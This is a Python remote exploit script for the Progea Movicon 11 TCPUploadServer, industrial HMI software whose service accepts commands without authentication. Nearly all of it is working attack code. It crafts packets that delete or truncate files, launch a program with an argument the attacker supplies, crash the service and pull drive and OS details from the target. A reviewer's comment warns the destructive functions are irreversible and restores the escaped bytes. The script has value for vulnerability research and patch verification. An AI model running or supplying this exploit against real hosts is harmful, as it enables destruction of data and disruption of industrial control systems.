
# Title : Progea Movicon 11 TCPUploadServer Remote Exploit
# Published : 2011-03-23
# Author : Jeremy Brown

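#!/usr/bin/python
# movi.py
# Progea Movicon TCPUploadServer Remote Exploit
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# TCPUploadServer allows remote users to execute functions on the server
# without any form of authentication. Impacts include deletion of arbitrary
# files, execution of a program with an arbitrary argument, crashing the
# server, information disclosure, and more. This design flaw puts the host
# running this server at risk of potentially unauthorized functions being
# executed on the system.
#
# Tested on Progea Movicon 11 TCPUploadServer running on Windows
#
# Fix: http://support.progea.com/download/Mov11.2_Setup.zip
#
# NOTE(review): functions 2, 3, 4, 5 and 8 are destructive on the target
# (they truncate/delete files, spawn a process or crash the service) and the
# service performs no authentication, so a stray run against the wrong host
# cannot be undone. Only use this against systems you are authorized to test;
# 6 and 7 are the non-destructive checks. The published listing had its
# backslash escapes mangled ("/x00", "/n"); they are restored here so the
# frames are actually NUL-padded instead of carrying the literal text "/x00".
import socket
import sys
from contextlib import closing

# Fixed 4-byte magic every request starts with.
HDR = b"MovX"
PORT = 10651
# Width of the NUL-padded argument field for the file/folder functions; the
# value comes from the original author's frames, the protocol is undocumented.
FIELD_LEN = 66
# Seconds to wait for connect/recv so a silent server does not hang the tool.
TIMEOUT = 10.0

# "B" is listed as 8 only for convenience. Other functions include (the real)
# 8, 9, A, and V.
FUNCS = frozenset((1, 2, 3, 4, 5, 6, 7, 8))

# Menu text shown by usage(), keyed by function number.
MENU = {
    1: "Create a folder",
    2: "Overwrite a file with NULL and cause 100% CPU",
    3: "Delete a file",
    4: "Execute moviconRunTime.exe with a specified argument",
    5: "Create a desktop shortcut",
    6: "Retrieve drive information",
    7: "Retrieve os service pack",
    8: "Crash the server",
}

# Progress line printed before a frame is sent; {0} is the user-supplied data.
DESCRIPTIONS = {
    1: 'Crafting a packet to create the folder "{0}"...',
    2: 'Crafting a packet to truncate (or create) the file "{0}" to 0 bytes '
       'and cause 100% CPU...',
    3: 'Crafting a packet to delete the file "{0}"...',
    4: 'Crafting a packet to execute moviconRunTime.exe with the argument '
       '"{0}"...',
    5: 'Crafting a packet to create a desktop shortcut with the name (also '
       'appended to the link path) "{0}"...',
    6: "Crafting a packet to retrieve drive information...",
    7: "Crafting a packet to retrieve os service pack...",
    8: "Crafting a packet to crash the server...",
}

# Command byte that follows the magic for each menu entry. Entry 8 of the
# menu is the "B" command (see the FUNCS comment), not the real function 8.
COMMAND_BYTE = {
    1: b"1", 2: b"2", 3: b"3", 4: b"4", 5: b"5", 6: b"6", 7: b"7", 8: b"B",
}


def build_packet(func, data=b"test"):
    """Return the raw request frame for menu entry *func*.

    Args:
        func: menu number 1-8 (see MENU).
        data: argument bytes for functions 1-5 (path, argument or shortcut
            name); ignored by 6, 7 and 8.

    Returns:
        The frame as bytes: HDR, the command byte, then the function-specific
        payload. For 1-5 the argument is NUL-padded to FIELD_LEN bytes (65
        for 4, whose extra "B" takes one byte of the field). Data longer
        than the field is sent unpadded, exactly as the original did.

    Raises:
        ValueError: if *func* is not a known menu entry.
    """
    if func not in FUNCS:
        raise ValueError("unknown function %r" % (func,))
    cmd = HDR + COMMAND_BYTE[func]
    if func in (1, 2, 3, 5):
        # Function 2: O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's
        # supposedly a copy function, but i'm moving on.
        return cmd + b"B" + data + b"\x00" * (FIELD_LEN - len(data))
    if func == 4:
        return cmd + b"BB" + data + b"\x00" * (FIELD_LEN - 1 - len(data))
    if func == 6:
        return cmd + b"\x01"
    # 7 and the crash frame both carry a single NUL after the command byte.
    return cmd + b"\x00"


def parse_info(func, raw):
    """Strip the response prefix in front of the data for functions 6 and 7.

    The offsets (6 and 22 bytes) are the ones the original author skipped;
    the response header layout itself is undocumented. Any other function
    returns *raw* unchanged.
    """
    if func == 6:
        return raw[6:]
    if func == 7:
        return raw[22:]
    return raw


def usage(prog):
    """Print the help text: usage line followed by the function menu."""
    print("Progea Movicon TCPUploadServer Remote Exploit")
    print("Usage: %s <target> <function> [data]" % prog)
    print("\nWhat would you like to do?\n")
    for num in sorted(MENU):
        print("[%d] %s" % (num, MENU[num]))
    print("")
    print('* Default data is "test"')


def main(argv):
    """Parse argv, send the chosen frame to <target>:10651 and print any reply.

    Args:
        argv: sys.argv-style list: prog, target, function, [data].

    Returns:
        Process exit status: 0 on success or when usage was shown, 1 on a bad
        function number or a network failure.
    """
    if len(argv) < 3:
        usage(argv[0])
        return 0
    target = argv[1]
    try:
        func = int(argv[2])
    except ValueError:
        print("Invalid function")
        return 1
    if func not in FUNCS:
        print("Invalid function")
        return 1
    data = argv[3] if len(argv) > 3 else "test"
    # argv is text on Python 3 and bytes on Python 2; the wire needs bytes.
    payload = data if isinstance(data, bytes) else data.encode("latin-1")
    field = FIELD_LEN - 1 if func == 4 else FIELD_LEN
    if func in (1, 2, 3, 4, 5) and len(payload) > field:
        print("Warning: data exceeds the %d-byte field; the frame will be "
              "oversized and the server's handling of that is untested." % field)

    print(DESCRIPTIONS[func].format(data))
    pkt = build_packet(func, payload)

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(TIMEOUT)
    with closing(sock):
        try:
            sock.connect((target, PORT))
            # The original sends the frame twice; the reason is not
            # documented (possibly the service expects a repeated request),
            # so the behaviour is preserved. sendall() avoids a short send.
            sock.sendall(pkt)
            sock.sendall(pkt)
        except socket.error as exc:
            print("Connection failed: %s" % exc)
            return 1
        print("\nPacket sent!")
        if func in (6, 7):
            try:
                info = sock.recv(128)
            except socket.timeout:
                info = b""
            if info:
                print("\nRetrieved info:\n")
                print(parse_info(func, info).decode("latin-1"))
            else:
                print("\nNo info")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))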